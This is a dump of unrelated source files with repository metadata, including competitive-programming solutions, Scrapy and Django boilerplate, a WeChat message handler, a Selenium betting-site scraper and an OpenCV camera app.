00899b9182a2710abdfd11fc903f3a4866a2efe0
38d93c5fd72fee380ec431b2ca60a069eef8579d
/Baekjoon,SWEA, etc/백준/4012요리사.py
3dc13f8f65a96aa2d92052c6c5f00e14aa6cf448
[]
no_license
whgusdn321/Competitive-programming
5d1b681f5bee90de5678219d91cd0fa764476ddd
3ff8e6b1d2facd31a8210eddeef851ffd0dce02a
refs/heads/master
2023-01-01T01:34:22.936373
2020-10-24T11:05:08
2020-10-24T11:05:08
299,181,046
0
0
null
null
null
null
UTF-8
Python
false
false
1,090
py
def make_combis(i, stakk, limit): global N, combis if len(stakk) == limit: anothor = [i for i in range(N) if i not in stakk] combis.append([stakk.copy(), anothor]) return for j in range(i+1, N): stakk.append(j) make_combis(j, stakk, limit) stakk.pop() T = int(input()) for tc in range(1, T+1): N = int(input()) maap = [] for _ in range(N): temp = [int(char) for char in input().split()] maap.append(temp) limit = N // 2 combis = [] make_combis(-1, [], limit) #print('combis : ', combis) results = [] for combi in combis: food1, food2 = combi a, b = 0, 0 for i in range(N//2): for j in range(i+1, N//2): a += maap[food1[i]][food1[j]] a += maap[food1[j]][food1[i]] for i in range(N//2): for j in range(i+1, N//2): b += maap[food2[i]][food2[j]] b += maap[food2[j]][food2[i]] results.append(abs(a - b)) print('#{} {}'.format(tc, min(results)))
[ "blackgoldace@naver.com" ]
blackgoldace@naver.com
e73ee26033ad8ab16f6bf631cc3d8896890ebe9b
721b77cd11d74a0bca941d16090e10124d24566a
/marchfelderebank/middlewares.py
ba8f7cb144f48d91bc2a1d1ae500bd557a394bfc
[]
no_license
SimeonYS/Marchfelder-Bank-eG
619195f4769c582c98dd4bf7a3038c0185d3e4f6
80d44f9633a7f4d860eb68ada6a81439a8eb442b
refs/heads/main
2023-03-05T16:48:53.917333
2021-02-17T12:23:20
2021-02-17T12:23:20
339,710,868
0
0
null
null
null
null
UTF-8
Python
false
false
3,668
py
# Define here the models for your spider middleware # # See documentation in: # https://docs.scrapy.org/en/latest/topics/spider-middleware.html from scrapy import signals # useful for handling different item types with a single interface from itemadapter import is_item, ItemAdapter class MarchfelderebankSpiderMiddleware: # Not all methods need to be defined. If a method is not defined, # scrapy acts as if the spider middleware does not modify the # passed objects. @classmethod def from_crawler(cls, crawler): # This method is used by Scrapy to create your spiders. s = cls() crawler.signals.connect(s.spider_opened, signal=signals.spider_opened) return s def process_spider_input(self, response, spider): # Called for each response that goes through the spider # middleware and into the spider. # Should return None or raise an exception. return None def process_spider_output(self, response, result, spider): # Called with the results returned from the Spider, after # it has processed the response. # Must return an iterable of Request, or item objects. for i in result: yield i def process_spider_exception(self, response, exception, spider): # Called when a spider or process_spider_input() method # (from other spider middleware) raises an exception. # Should return either None or an iterable of Request or item objects. pass def process_start_requests(self, start_requests, spider): # Called with the start requests of the spider, and works # similarly to the process_spider_output() method, except # that it doesn’t have a response associated. # Must return only requests (not items). for r in start_requests: yield r def spider_opened(self, spider): spider.logger.info('Spider opened: %s' % spider.name) class MarchfelderebankDownloaderMiddleware: # Not all methods need to be defined. If a method is not defined, # scrapy acts as if the downloader middleware does not modify the # passed objects. 
@classmethod def from_crawler(cls, crawler): # This method is used by Scrapy to create your spiders. s = cls() crawler.signals.connect(s.spider_opened, signal=signals.spider_opened) return s def process_request(self, request, spider): # Called for each request that goes through the downloader # middleware. # Must either: # - return None: continue processing this request # - or return a Response object # - or return a Request object # - or raise IgnoreRequest: process_exception() methods of # installed downloader middleware will be called return None def process_response(self, request, response, spider): # Called with the response returned from the downloader. # Must either; # - return a Response object # - return a Request object # - or raise IgnoreRequest return response def process_exception(self, request, exception, spider): # Called when a download handler or a process_request() # (from other downloader middleware) raises an exception. # Must either: # - return None: continue processing this exception # - return a Response object: stops process_exception() chain # - return a Request object: stops process_exception() chain pass def spider_opened(self, spider): spider.logger.info('Spider opened: %s' % spider.name)
[ "simeon.simeonov@ADPVT.com" ]
simeon.simeonov@ADPVT.com
60ab1489088b31707cfd6d1c0b22af2b86e2e4dd
84c4474a88a59da1e72d86b33b5326003f578271
/saleor/graphql/menu/mutations/menu_update.py
cc4bee256c0cd0517f1ae8a880c5c915fb1e9b1d
[ "BSD-3-Clause" ]
permissive
vineetb/saleor
052bd416d067699db774f06453d942cb36c5a4b7
b0d5ec1a55f2ceeba6f62cf15f53faea0adf93f9
refs/heads/main
2023-07-20T02:01:28.338748
2023-07-17T06:05:36
2023-07-17T06:05:36
309,911,573
0
0
NOASSERTION
2020-11-04T06:32:55
2020-11-04T06:32:55
null
UTF-8
Python
false
false
1,689
py
import graphene from ....menu import models from ....permission.enums import MenuPermissions from ....webhook.event_types import WebhookEventAsyncType from ...channel import ChannelContext from ...core import ResolveInfo from ...core.mutations import ModelMutation from ...core.types import MenuError from ...core.utils import WebhookEventInfo from ...plugins.dataloaders import get_plugin_manager_promise from ..types import Menu class MenuInput(graphene.InputObjectType): name = graphene.String(description="Name of the menu.") slug = graphene.String(description="Slug of the menu.", required=False) class MenuUpdate(ModelMutation): class Arguments: id = graphene.ID(required=True, description="ID of a menu to update.") input = MenuInput( required=True, description="Fields required to update a menu." ) class Meta: description = "Updates a menu." model = models.Menu object_type = Menu permissions = (MenuPermissions.MANAGE_MENUS,) error_type_class = MenuError error_type_field = "menu_errors" webhook_events_info = [ WebhookEventInfo( type=WebhookEventAsyncType.MENU_UPDATED, description="A menu was updated.", ), ] @classmethod def post_save_action(cls, info: ResolveInfo, instance, cleaned_input): manager = get_plugin_manager_promise(info.context).get() cls.call_event(manager.menu_updated, instance) @classmethod def success_response(cls, instance): instance = ChannelContext(node=instance, channel_slug=None) return super().success_response(instance)
[ "noreply@github.com" ]
vineetb.noreply@github.com
e58a210e35b00d7436f86b19cc0b7f3004ea0685
ba095b34fb62cff6f5f6f32dc7036f13b45681a2
/llia/synths/chronos/chronos_random.py
9efb38afa7d9ca00ff2c6f8f8e3e8c2ecd0c355e
[]
no_license
plewto/Llia
7d3c60bd7355d02e9b00e97c82f24da5fa83b0f4
97f530ff0841b9604f0d9575e7e1f0e3c0660be0
refs/heads/master
2020-05-21T20:39:07.223990
2018-04-30T02:28:55
2018-04-30T02:28:55
63,315,753
17
2
null
2016-08-04T17:10:17
2016-07-14T08:05:33
Python
UTF-8
Python
false
false
1,563
py
# llia.synths.chronos.chronos_random from llia.util.lmath import * from llia.synths.chronos.chronos_data import chronos def random_program(slot=127, *_): p = chronos(slot, "Random", lfoCommonFreq = coin(0.75, rnd(3),rnd(10)), d1Dry1In = 1.0, d1Dry2In = 0.0, d1DelayTime = coin(0.5, rnd(2), coin(0.5, rnd(0.2), rnd(0.01))), d1LfoRatio = pick([0.125,0.25,0.5,0.75,1.0,1.5,2,3,4,5,6,8]), d1ExternalModDepth = 0.0, d1Lowpass = coin(0.75, 20000, pick([1000,2000,4000,8000])), d1Highpass = coin(0.75, 40, pick([200,400,800,1600,3200])), d1Feedback = coin(0.75, rnd(0.75), rnd()), d2Dry1In = 0.0, d2Dry2In = 1.0, d2Delay1In = coin(0.75, 0.0, 1.0), d2DelayTime = coin(0.5, rnd(2), coin(0.5, rnd(0.2), rnd(0.01))), d2LfoRatio = pick([0.125,0.25,0.5,0.75,1.0,1.5,2,3,4,5,6,8]), d2ExternalModDepth = 0.0, d2Lowpass = coin(0.75, 20000, pick([1000,2000,4000,8000])), d2Highpass = coin(0.75, 40, pick([200,400,800,1600,3200])), d2Feedback = coin(0.75, rnd(0.75), rnd()), dry1Amp = 1.0, dry2Amp = 1.0, d1Amp = coin(0.75, 1, 0.5 + rnd(0.5)), d2Amp = coin(0.75, 1, 0.5 + rnd(0.5)), dry1Pan = 0.75, dry2Pan = -0.75, d1Pan = -0.75, d2Pan = 0.75) return p
[ "plewto@gmail.com" ]
plewto@gmail.com
4df5f4f912e51465974e6961e67ab1f8ec461158
d5d94c992d0596080ba694c518dfdb58d3490847
/0517/answer.py
6843c0a98adeaf6bb764fda2bb909b3cd2e7b224
[]
no_license
calgagi/leetcode
1bf24b750e44c2c893935983e5d88e0f071d9f2d
431aba979d92e331f2f92a07eb80167a823a49bd
refs/heads/master
2022-11-17T11:26:01.596496
2020-07-19T06:56:04
2020-07-19T06:56:04
276,207,528
0
0
null
null
null
null
UTF-8
Python
false
false
382
py
class Solution(object): def distributeCandies(self, candies): """ :type candies: List[int] :rtype: int """ num_candies = len(candies) sis_candies = num_candies // 2 num_types = len(list(set(candies))) if sis_candies >= num_types: return num_types else: return sis_candies
[ "calgagi@gmail.com" ]
calgagi@gmail.com
79cd9eeb476d0cee73e718951128251dd11d8676
df44affab179c2546fb3e0d1dc29eebcfdf51c1c
/toughradius/modules/mps/mps_handler.py
f405a4e7c770fd90e9e92adcaf1582a124afe6a7
[]
no_license
sailorhdx/taurusradius
121c508e7faffaddcd5326d2b6d3710eaf0ed08e
92d30820611a0c9102ae41713ea3c35437a3c6ee
refs/heads/master
2021-01-22T02:28:31.543338
2017-06-17T02:15:33
2017-06-17T02:15:33
92,362,551
0
0
null
null
null
null
UTF-8
Python
false
false
4,079
py
#!/usr/bin/env python # coding=utf-8 import cyclone.web from toughradius.toughlib import logger from toughradius.toughlib import utils from toughradius.toughlib import logger from toughradius.toughlib.permit import permit from hashlib import sha1 from cyclone.util import ObjectDict from cyclone.options import options from twisted.internet import defer from toughradius.common import wxrouter from toughradius.modules.mps.base import BaseHandler from toughradius.modules import models from wechat_sdk import WechatBasic from wechat_sdk import WechatConf import functools @permit.route('/') class HelloHandler(BaseHandler): def get(self): self.write('ok') @permit.route('/MP_verify_Z677kYAea8jAjpEn.txt') class VerifyHandler(BaseHandler): def get(self): self.write('Z677kYAea8jAjpEn') @permit.route('/mps') class IndexHandler(BaseHandler): """ 微信消息主要处理控制器 """ WechatConfCachekey = 'toughee.wechat.conf.cache' def check_xsrf_cookie(self): """ 对于微信消息不做加密cookie处理 """ pass def get_error_html(self, status_code = 500, **kwargs): """ 定制微信消息错误返回 """ self.set_header('Content-Type', 'application/xml;charset=utf-8') self.write(self.wechat.response_text(u'回复h查看帮助。')) self.finish() def check_signature(self): """ 微信消息验签处理 """ signature = self.get_argument('signature', '') timestamp = self.get_argument('timestamp', '') nonce = self.get_argument('nonce', '') return self.wechat.check_signature(signature=signature, timestamp=timestamp, nonce=nonce) def init_wechat(self): try: wechat_conf_cache = self.cache.get(self.WechatConfCachekey) if not wechat_conf_cache: token = self.get_param_value('mps_token') appid = self.get_param_value('mps_appid') appsecret = self.get_param_value('mps_apisecret') encrypt_mode = self.get_param_value('mps_encrypt_mode', 'normal') encoding_aes_key = self.get_param_value('mps_encoding_aes_key', '') wechat_conf_cache = dict(token=token, appid=appid, appsecret=appsecret, encrypt_mode=encrypt_mode, encoding_aes_key=encoding_aes_key) self.cache.set(self.WechatConfCachekey, 
wechat_conf_cache, expire=300) _c = wechat_conf_cache wechat_conf = WechatConf(token=_c['token'], appid=_c['appid'], appsecret=_c['appsecret'], encrypt_mode=_c['encrypt_mode'], encoding_aes_key=_c['encoding_aes_key'], access_token_getfunc=functools.partial(self.mpsapi.get_access_token, _c['appid'], _c['appsecret']), access_token_setfunc=self.mpsapi.set_access_token) self.wechat = WechatBasic(conf=wechat_conf) except Exception as err: logger.exception(err) def get(self): self.init_wechat() echostr = self.get_argument('echostr', '') if self.check_signature(): self.write(echostr) logger.info('Signature check success.') else: logger.error('Signature check failed.') @defer.inlineCallbacks def post(self): """ 微信消息处理 """ self.init_wechat() if not self.check_signature(): logger.error('Signature check failed.') return try: self.set_header('Content-Type', 'application/xml;charset=utf-8') body = self.request.body self.wechat.parse_data(body) msg = self.wechat.get_message() logger.debug(u'message type %s from %s with %s' % (self.wechat.message.type, self.wechat.message.source, body.decode('utf-8'))) response = yield wxrouter.dispatch(msg, gdata=self.application, wechat=self.wechat) logger.debug(u'Replied to %s with "%s"' % (self.wechat.message.source, response)) self.write(response) except Exception as err: logger.exception(err) self.write('error')
[ "sailorhdx@hotmail.com" ]
sailorhdx@hotmail.com
14945d7b57c4ff2d8fed1b2f4dab066b14139eba
e3040a2e23a856e319e02037dc6baf3882c796b9
/samples/openapi3/client/3_0_3_unit_test/python/unit_test_api/paths/response_body_post_nested_allof_to_check_validation_semantics_response_body_for_content_types/post.py
e29ea0fbc5326b35c7b6a6444df16c2c0b1597cf
[ "Apache-2.0" ]
permissive
mishin/openapi-generator
2ed2e0739c0cc2a627c25191d5898071d9294036
3ed650307513d552404f3d76487f3b4844acae41
refs/heads/master
2023-06-10T03:01:09.612130
2022-10-14T08:29:15
2022-10-14T08:29:15
271,080,285
0
0
Apache-2.0
2023-05-30T02:01:25
2020-06-09T18:29:41
Java
UTF-8
Python
false
false
8,103
py
# coding: utf-8 """ Generated by: https://openapi-generator.tech """ from dataclasses import dataclass import typing_extensions import urllib3 from urllib3._collections import HTTPHeaderDict from unit_test_api import api_client, exceptions from datetime import date, datetime # noqa: F401 import decimal # noqa: F401 import functools # noqa: F401 import io # noqa: F401 import re # noqa: F401 import typing # noqa: F401 import typing_extensions # noqa: F401 import uuid # noqa: F401 import frozendict # noqa: F401 from unit_test_api import schemas # noqa: F401 from unit_test_api.model.nested_allof_to_check_validation_semantics import NestedAllofToCheckValidationSemantics from . import path SchemaFor200ResponseBodyApplicationJson = NestedAllofToCheckValidationSemantics @dataclass class ApiResponseFor200(api_client.ApiResponse): response: urllib3.HTTPResponse body: typing.Union[ SchemaFor200ResponseBodyApplicationJson, ] headers: schemas.Unset = schemas.unset _response_for_200 = api_client.OpenApiResponse( response_cls=ApiResponseFor200, content={ 'application/json': api_client.MediaType( schema=SchemaFor200ResponseBodyApplicationJson), }, ) _status_code_to_response = { '200': _response_for_200, } _all_accept_content_types = ( 'application/json', ) class BaseApi(api_client.Api): @typing.overload def _post_nested_allof_to_check_validation_semantics_response_body_for_content_types_oapg( self, accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, skip_deserialization: typing_extensions.Literal[False] = ..., ) -> typing.Union[ ApiResponseFor200, ]: ... @typing.overload def _post_nested_allof_to_check_validation_semantics_response_body_for_content_types_oapg( self, accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, ) -> api_client.ApiResponseWithoutDeserialization: ... 
@typing.overload def _post_nested_allof_to_check_validation_semantics_response_body_for_content_types_oapg( self, accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, skip_deserialization: bool = ..., ) -> typing.Union[ ApiResponseFor200, api_client.ApiResponseWithoutDeserialization, ]: ... def _post_nested_allof_to_check_validation_semantics_response_body_for_content_types_oapg( self, accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, skip_deserialization: bool = False, ): """ :param skip_deserialization: If true then api_response.response will be set but api_response.body and api_response.headers will not be deserialized into schema class instances """ used_path = path.value _headers = HTTPHeaderDict() # TODO add cookie handling if accept_content_types: for accept_content_type in accept_content_types: _headers.add('Accept', accept_content_type) response = self.api_client.call_api( resource_path=used_path, method='post'.upper(), headers=_headers, stream=stream, timeout=timeout, ) if skip_deserialization: api_response = api_client.ApiResponseWithoutDeserialization(response=response) else: response_for_status = _status_code_to_response.get(str(response.status)) if response_for_status: api_response = response_for_status.deserialize(response, self.api_client.configuration) else: api_response = api_client.ApiResponseWithoutDeserialization(response=response) if not 200 <= response.status <= 299: raise exceptions.ApiException(api_response=api_response) return api_response class PostNestedAllofToCheckValidationSemanticsResponseBodyForContentTypes(BaseApi): # this class is used by api classes that refer to endpoints with operationId fn names @typing.overload def post_nested_allof_to_check_validation_semantics_response_body_for_content_types( self, 
accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, skip_deserialization: typing_extensions.Literal[False] = ..., ) -> typing.Union[ ApiResponseFor200, ]: ... @typing.overload def post_nested_allof_to_check_validation_semantics_response_body_for_content_types( self, accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, ) -> api_client.ApiResponseWithoutDeserialization: ... @typing.overload def post_nested_allof_to_check_validation_semantics_response_body_for_content_types( self, accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, skip_deserialization: bool = ..., ) -> typing.Union[ ApiResponseFor200, api_client.ApiResponseWithoutDeserialization, ]: ... def post_nested_allof_to_check_validation_semantics_response_body_for_content_types( self, accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, skip_deserialization: bool = False, ): return self._post_nested_allof_to_check_validation_semantics_response_body_for_content_types_oapg( accept_content_types=accept_content_types, stream=stream, timeout=timeout, skip_deserialization=skip_deserialization ) class ApiForpost(BaseApi): # this class is used by api classes that refer to endpoints by path and http method names @typing.overload def post( self, accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, skip_deserialization: typing_extensions.Literal[False] = ..., ) -> typing.Union[ ApiResponseFor200, ]: ... 
@typing.overload def post( self, accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, ) -> api_client.ApiResponseWithoutDeserialization: ... @typing.overload def post( self, accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, skip_deserialization: bool = ..., ) -> typing.Union[ ApiResponseFor200, api_client.ApiResponseWithoutDeserialization, ]: ... def post( self, accept_content_types: typing.Tuple[str] = _all_accept_content_types, stream: bool = False, timeout: typing.Optional[typing.Union[int, typing.Tuple]] = None, skip_deserialization: bool = False, ): return self._post_nested_allof_to_check_validation_semantics_response_body_for_content_types_oapg( accept_content_types=accept_content_types, stream=stream, timeout=timeout, skip_deserialization=skip_deserialization )
[ "noreply@github.com" ]
mishin.noreply@github.com
d0d1f9a841d791ae8e639e2c66b270b9976eaf6e
d1b3c9e1055bc759f5fba8379570ddc20cf4caa5
/main_thread.py
6ab3d3bc3e6d2ad5de46671370e69f0262faf70a
[]
no_license
woolpeeker/bet365_data
309b38245c77d9f9387c7d946dbb8410c4c84bc6
4cb920095f98faf220c74125d39ccdfe84229ee3
refs/heads/master
2020-03-29T22:48:40.234365
2018-12-14T03:41:42
2018-12-14T03:41:42
150,441,477
2
1
null
null
null
null
UTF-8
Python
false
false
4,950
py
from selenium.common.exceptions import TimeoutException from selenium import webdriver from selenium.webdriver.firefox.options import Options import datetime import time import traceback import os import multiprocessing as mp from Crawler import Crawler from utils import get_logger NT = 2 class MainThread(Crawler): def __init__(self, name='MainThead'): self.name = name self.logger=get_logger(name=self.name) super(MainThread, self).__init__(name) self.out_queue = mp.Queue(maxsize=1000) self.browserPID = mp.Value('i', 0) self.process = mp.Process(target=self.run, name=name) self.process.daemon = True self.process.start() def run(self): self.logger.info('Mainthread start') while True: try: self.work_loop() except: self.logger.error(traceback.format_exc()) finally: self._close() self.logger.info('work_loop restarting...') def work_loop(self): self._open() while True: self.logger.info('work_loop start.') if not self.click_soccer(): self.logger.info('No Soccer Section. Waiting 3 min.') time.sleep(3 * 60) continue self.wait4elem('//span[@class="ipo-TeamStack_TeamWrapper"]') teams_league = self._get_team_names() self.logger.info('Found %d match' % len(teams_league)) self.logger.info('teams_leagues:%s' % teams_league) for elem in teams_league: self.out_queue.put_nowait(elem) self.logger.info('Put elem to quenes. 
Sleep 3 minutes.') time.sleep(60 * 3) def _open(self): self.logger.debug('function _open') options = Options() options.headless = True self.browser = webdriver.Firefox(options=options) with self.browserPID.get_lock(): self.browserPID.value = self.browser.service.process.pid self.logger.info('browserPID=%d'%self.browserPID.value) self.browser.get('https://www.bet365.com/en') self.init_time = datetime.datetime.now() self.wait4elem('//div[@id="dBlur"][contains(@style,"hidden;")]', timeout=300) # click the welcome sports banner and inplay section entry_banner = self.browser.find_element_by_xpath('//div[@id="dv1"]') entry_banner.click() inplay_banner = self.wait4elem('//a[@class="hm-BigButton "][text()="In-Play"]', timeout=300) inplay_banner.click() self.wait4elem('//div[contains(@class,"ipo-Fixture_ScoreDisplay")]', timeout=300) def _close(self): self.logger.warning('browser close') try: self.browser.quit() except Exception as e: self.logger.error('browser close fail.') self.logger.error(traceback.format_exc()) def _get_team_names(self): # team_names is a list that each elem is a tuple represent a match # (list of team, league name) result = [] leagues = self.xpaths('//div[contains(@class,"ipo-CompetitionButton_NameLabel ")]/../..') for league in leagues: league_name=self.xpaths('.//div[contains(@class, "ipo-CompetitionButton_NameLabel")]',section=league)[0].text match_list = self.xpaths('.//div[contains(@class,"ipo-Fixture_ScoreDisplay")]',section=league) if not match_list: self.logger.warning('No match in %s' % league_name) continue for m in match_list: team_names = self.xpaths('.//span[contains(@class,"ipo-TeamStack_TeamWrapper")]', m) if not team_names: self.logger.warning('No team in %s' % league_name) continue team_names = tuple([x.text for x in team_names][:2]) result.append((team_names, league_name)) return result def click_overview(self): overview = self.wait4elem('//div[contains(@class,"ip-ControlBar_BBarItem ")]') overview.click() 
self.wait4elem('//div[contains(@class,"ipo-Fixture_ScoreDisplay")]') def click_soccer(self): self.logger.info('click soccer') retry_times=2 for i in range(retry_times): try: self.click_overview() soccer_button = self.wait4elem('//div[@class="ipo-ClassificationBarButtonBase_Label "][text()="Soccer"]') soccer_button.click() return True except TimeoutException as e: self.logger.warning('TimeOut: click soccer.') if i<retry_times: self.logger.warning('refresh and retry') self.browser.refresh() else: self.logger.warning('excced retry times') return False
[ "luojiapeng1993@gmail.com" ]
luojiapeng1993@gmail.com
7b6da9e011a8e2ebc5bce6257356735f68ba91dd
2a57c1a6d27304f80975bdef51ec398a690f0b2d
/lib/jubatest/__init__.py
e6af2fcc1460788bb31272b888df37d452a7422b
[]
no_license
kmaehashi/jubatest
53574b1a271731f07e98ba1c333084a653cc4044
ea5e1066bda09a8da1ad3de28ed71ad18317b6cf
refs/heads/master
2020-04-15T23:51:54.169966
2016-03-30T05:09:33
2016-03-30T05:09:33
12,368,976
1
0
null
2015-06-02T07:55:28
2013-08-26T01:39:26
Python
UTF-8
Python
false
false
165
py
# -*- coding: utf-8 -*- from __future__ import absolute_import, division, print_function, unicode_literals from .unit import JubaTestCase from .constants import *
[ "webmaster@kenichimaehashi.com" ]
webmaster@kenichimaehashi.com
ee9fb75785fb2393afaf072d38ab68d24b5bd23d
91283509c7cd4b309758c703303f761c6b400b53
/software/misc/get_gene_de.py
ec08fa8a00c06250a8a74335fb514bcddc9a4ece
[ "MIT" ]
permissive
Searchlight2/Searchlight2
0682c90e13e49ede961d5e43113fd7dd8728667e
f672860af3b882a06f39ada00b53da134d5a2ffa
refs/heads/master
2023-06-16T13:50:29.405772
2023-05-27T11:13:18
2023-05-27T11:13:18
223,948,179
27
13
NOASSERTION
2023-02-17T10:53:49
2019-11-25T12:52:37
Python
UTF-8
Python
false
false
171
py
def get_gene_de(global_variables,de_Dict): values_list = [de_Dict["log2fold"],de_Dict["p"],de_Dict["p.adj"],de_Dict["sig"],de_Dict["valid"]] return values_list
[ "john.cole@glasgow.ac.uk" ]
john.cole@glasgow.ac.uk
19564d429f9e45a0c1b7ce769789245222189b4c
9aa7d3c6d563a434595141f5b4dd8c54252a4d40
/tweets/migrations/0008_preference.py
b40286d91e8ba528407d73a1b8c004147d5939d4
[]
no_license
akhad97/Test-Web-App
9e200fc6d394cf6d52e72cb5f360d013e777fa9c
eb9b3480732c86f836748967bcfd6201dac6a6ee
refs/heads/master
2023-07-19T12:24:26.400998
2021-09-06T11:55:20
2021-09-06T11:55:20
402,657,324
1
0
null
null
null
null
UTF-8
Python
false
false
1,032
py
# Generated by Django 2.2.13 on 2021-07-29 18:06 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('tweets', '0007_auto_20210729_1049'), ] operations = [ migrations.CreateModel( name='Preference', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('value', models.IntegerField()), ('date', models.DateTimeField(auto_now=True)), ('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tweets.Post')), ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'unique_together': {('user', 'post', 'value')}, }, ), ]
[ "ahadjon.abdullaev1997@gmail.com" ]
ahadjon.abdullaev1997@gmail.com
cd2559b6e2a918d2843f950eba85bcc1ee347513
9ccb49d3216fd12a79fa73d4cdc6ecf51602f286
/video/cameo.py
45826719500cd312d2708ea390c6a2530c2fa7cb
[]
no_license
shidoutsuruya/my_opencv
a12d665a2bbbc911b56b682f5c51638651354616
910748ee98271948eedcec36ee308396547f4a2e
refs/heads/master
2023-07-04T18:32:49.639714
2021-09-02T13:24:45
2021-09-02T13:24:45
402,426,956
0
1
null
null
null
null
UTF-8
Python
false
false
2,399
py
import cv2 import sys sys.path.append(r'C:\Users\max21\Desktop\Python\OpenCV\video') from managers import WindowManager,Capturemanager import filter class Cameo(object): def __init__(self): #创建一个窗口,并将键盘的回调函数传入 self._windowManager = WindowManager('Cameo', self.onKeypress) #告诉程序数据来自摄像头,还有镜面效果 self._captureManager = Capturemanager( cv2.VideoCapture(0), self._windowManager, True ) self._curveFilter=filter.BGRPortraCurveFilter()#change def run(self): '''Run the main loop''' self._windowManager.createWindow()#创建窗口,设置self._isWindowCreated = True控制循环提取摄像头信息 while self._windowManager.isWindowCreated: #这里的enterFrame作用使得从程序从摄像头中取数据 self._captureManager.enterFrame()#开启窗口 #frame是原始帧数据,未做任何改动 frame = self._captureManager.frame#获得当前帧 filter.strokeEdges(frame,frame)######change self._curveFilter.apply(frame,frame)######change #TODO: filter the frame(Chapter 3) #exitFrame()主要功能:实现截屏,录屏 self._captureManager.exitFrame()#根据控制参数,选择是否进行截屏和录屏,并将self._frame等参数还原准备下一次循环 #回调函数 self._windowManager.processEvent() def onKeypress(self, keycode): '''Handle a keypress space -> Take a screenshot tab -> State/stop recording a screencast escape -> Quit ''' if keycode == 32: #Space #截取保存的文件名称 self._captureManager.WriteImage(r'C:\Users\max21\Desktop\screenshot.png')#设置截取图片保存信息 elif keycode == 9:#tab if not self._captureManager.isWritingVideo:#判断为开始录制视频或结束录制视频 #录像保存的文件名字 self._captureManager.startWritingVideo( r'C:\Users\max21\Desktop\screencast.avi' ) else: self._captureManager.stopWritingVideo() elif keycode == 27: #escape self._windowManager.destroyWindow() if __name__ == '__main__': Cameo().run()
[ "shidoutsuruya@gmail.com" ]
shidoutsuruya@gmail.com
77cc550ae737bb0ee04e2770fd25d189cae5cd7d
99b84337ae66ad2877544fd158f20e7f4cd96520
/day01-10/day03/07-if语句.py
12ece94197133e1b68e793b0fca8e9db9d46452a
[]
no_license
jiajiabin/python_study
cf145d54cabce2cb98914b3448ed7d0e5c1c146c
b4faaff26ee9728af2e80942ba6a7c7f6a8b0f86
refs/heads/master
2020-06-21T21:31:26.034978
2019-08-26T11:39:34
2019-08-26T11:39:34
197,556,254
2
0
null
null
null
null
UTF-8
Python
false
false
211
py
# if语句 print('line01') if 5 < 3: print("Good!") # python比其他语言更重视缩进 print("Good day!") if 5 + 3: print("Excellent!!") if 5 * 0: print("Not bad!!") print('line02')
[ "2592668397@qq.com" ]
2592668397@qq.com
987daffedbfae7ec715410bded64b9b080d0592d
19c87c46013ce41abbec7db48ae9cc3e6d015269
/lib/node_modules/@stdlib/math/base/special/atan/benchmark/python/benchmark.py
5c9898b5907409301c61bb752c405b40492d5bc1
[ "BSD-3-Clause", "BSL-1.0", "Apache-2.0", "LicenseRef-scancode-unknown-license-reference" ]
permissive
rreusser/stdlib
834428bcfcc76202e8d6a241b6d0aa6446f0da72
ca98ecb7e3736c290e32595f8cb57a98cf7ef509
refs/heads/develop
2021-01-20T13:26:42.198550
2017-05-06T19:44:19
2017-05-06T19:44:19
90,491,573
0
0
null
2017-05-06T21:15:05
2017-05-06T21:15:05
null
UTF-8
Python
false
false
1,516
py
#!/usr/bin/env python """Benchmark atan.""" import timeit name = "atan" repeats = 3 iterations = 1000000 def print_version(): """Print the TAP version.""" print("TAP version 13") def print_summary(total, passing): """Print the benchmark summary. # Arguments * `total`: total number of tests * `passing`: number of passing tests """ print("#") print("1.." + str(total)) # TAP plan print("# total " + str(total)) print("# pass " + str(passing)) print("#") print("# ok") def print_results(elapsed): """Print benchmark results. # Arguments * `elapsed`: elapsed time (in seconds) # Examples ``` python python> print_results(0.131009101868) ``` """ rate = iterations / elapsed print(" ---") print(" iterations: " + str(iterations)) print(" elapsed: " + str(elapsed)) print(" rate: " + str(rate)) print(" ...") def benchmark(): """Run the benchmark and print benchmark results.""" setup = "from math import atan; from random import random;" stmt = "y = atan(10000.0*random() - 0.0)" t = timeit.Timer(stmt, setup=setup) print_version() for i in xrange(3): print("# python::" + name) elapsed = t.timeit(number=iterations) print_results(elapsed) print("ok " + str(i+1) + " benchmark finished") print_summary(repeats, repeats) def main(): """Run the benchmark.""" benchmark() if __name__ == "__main__": main()
[ "kgryte@gmail.com" ]
kgryte@gmail.com
9de0ceb6297499202c5213b01406fa2c200f205e
80db1d25ed31c1a7b45653775517b9eff22dd67b
/vcoasm/compilables.py
a2d947551ea19b6f6988c8941f2a7334eaee7fa8
[ "MIT" ]
permissive
vcokltfre/vcoasm
e45fb4d31a0ac6e054cc75cc4fe1ef41e9ab4990
cb660465d78bf6b479ba7f6a38bae9385a67b6c0
